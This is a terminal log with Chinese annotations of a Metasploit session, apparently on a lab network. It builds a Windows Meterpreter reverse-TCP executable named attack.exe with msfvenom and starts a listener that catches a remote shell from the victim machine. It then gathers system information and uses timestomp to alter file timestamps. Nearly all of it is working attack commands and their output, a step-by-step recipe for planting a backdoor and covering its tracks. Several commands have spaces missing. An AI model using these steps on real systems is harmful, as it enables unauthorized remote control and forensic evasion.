root@kali:~# msfvenom -pwindows/meterpreter/reverse_tcp lhost=192.168.1.117 lport=1234 --format=exe> /root/attack.exe
No platform was selected, choosingMsf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 fromthe payload
No encoder or badchars specified,outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes
Saved as: /root/attack.exe (病毒)
root@kali:~# service postgresql start
root@kali:~# msfconsole
root@kali:~# db_status
msf > use exploit/multi/handler
msf exploit(handler) > set payloadwindows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost192.168.1.117 (kali linux主机)
msf exploit(handler) > set lport 1234
msf exploit(handler) > show options
msf exploit(handler) > exploit -h
msf exploit(handler) > exploit -j z
[*] Exploit running as background job.
[*] Started reverse TCP handler on192.168.1.117:1234
msf exploit(handler) > [*] Starting thepayload handler...
开始监听
windows主机运行attack.exe
msf exploit(handler) > [*] Starting thepayload handler...
[*] Sending stage (957999 bytes) to192.168.1.94
[*] Meterpreter session 1 opened(192.168.1.117:1234 -> 192.168.1.94:58540) at 2017-03-10 00:16:54 -0500 (windows主机运行attack.exe后产生session 1)
msf exploit(handler) > sessions -i
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 sh-270\sewells @ SH-270 192.168.1.117:1234 -> 192.168.1.94:58540(192.168.1.94)
msf exploit(handler) > sessions -i1 (1是session Id号码)
meterpreter > pwd (成功登陆)
C:\Users\sewells\Desktop
meterpreter > sysinfo
Computer : SH-270
OS : Windows 10 (Build 14393).
Architecture : x64 (Current Process is WOW64)
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/win32
meterpreter > getuid
Server username: sh-270\sewells
meterpreter > timestomp -h 修改***时间
meterpreter > timestomp attack.exe -v
Modified : 2017-03-10 00:01:11 -0500
Accessed : 2017-03-10 00:03:26 -0500
Created : 2017-03-10 00:18:07 -0500
Entry Modified: 2017-03-10 00:18:07 -0500